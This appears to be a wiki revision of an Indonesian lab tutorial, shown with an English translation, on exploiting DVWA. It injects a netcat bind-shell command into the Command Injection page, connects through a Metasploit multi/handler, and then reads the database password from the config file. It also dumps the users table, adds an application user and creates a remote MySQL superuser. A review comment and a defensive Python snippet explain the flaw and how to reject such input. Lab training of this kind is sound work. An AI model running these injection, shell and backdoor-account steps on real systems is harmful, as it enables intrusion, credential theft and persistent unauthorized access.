Difference between revisions of "DVWA: Exploit menggunakan Metasploit"

From OnnoWiki
Line 14: Line 14:
 
  DVWA Security > Security Level Low > Submit
 
  DVWA Security > Security Level Low > Submit
  
 +
 +
==Siapkan NetCat==
 +
 +
Masuk ke DVWA Command Injection, lakukan
 +
 +
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
 +
 +
Dimana 192.168.0.100 adalah IP address server DVWA
  
 
==Gunakan metasploit==
 
==Gunakan metasploit==
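
Review bot: the added sentence "Dimana 192.168.0.100 adalah IP address server DVWA" does not match the preparation step on this page, which reaches DVWA at http://192.168.0.80/DVWA-1.9. Pick one lab address and use it consistently in the injected input and in the later "set RHOST" line. The new section also leaves /tmp/pipe and an unauthenticated listener on port 4444 on the DVWA server; consider adding a closing line that tells the reader to remove the FIFO and stop the listener once the exercise is finished.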

Revision as of 03:54, 4 May 2017

Source: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html

Preparation

Log in to DVWA, for example

http://192.168.0.80/DVWA-1.9
username admin
password password

Click

DVWA Security > Security Level Low > Submit


Prepare NetCat

Go to DVWA Command Injection and enter

192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Where 192.168.0.100 is the IP address of the DVWA server
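
Why the input above is accepted at Security Level Low, and how a handler can reject it, shown as an added example (not part of the original page and not DVWA's own code). The function names and the `ping -c 4` command line are assumptions made for illustration.

```python
import ipaddress
import shlex
import subprocess

# Input taken verbatim from the page's NetCat step.
PAGE_INPUT = "192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe"

CONTROL_OPERATORS = {";", "|", "||", "&", "&&"}


def vulnerable_command(target):
    """Assumed Low-level behaviour: user text is concatenated into a shell string."""
    return "ping -c 4 " + target


def programs_shell_would_start(cmdline):
    """Approximate sh parsing: first word of the line and after each control operator."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    programs, expect_program = [], True
    for token in lexer:
        if token in CONTROL_OPERATORS:
            expect_program = True
        elif expect_program:
            programs.append(token)
            expect_program = False
    return programs


def safe_ping_argv(target):
    """Hardened form: accept only a literal IPv4 address, build an argv list."""
    ip = ipaddress.IPv4Address(target.strip())  # ValueError on anything else
    return ["ping", "-c", "4", str(ip)]


def run_ping(target):
    """Run ping without a shell, so ';' and '|' are never interpreted."""
    return subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, timeout=15, check=False)


if __name__ == "__main__":
    print(programs_shell_would_start(vulnerable_command(PAGE_INPUT)))
    try:
        safe_ping_argv(PAGE_INPUT)
    except ValueError as err:
        print("rejected:", err)
    print(safe_ping_argv("192.168.0.100"))
```
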

Use Metasploit

Run

msfconsole

Then run


use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.0.100
exploit

Check password

whoami
grep apache /etc/passwd
grep apache /etc/group


Check the password through the web configuration

ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/DVWA*
ls -l /var/www/html/DVWA*

Find the database password

ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php

Explore the database


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Create a new user

echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

View MySQL table information


echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD

Create a new MySQL user

echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
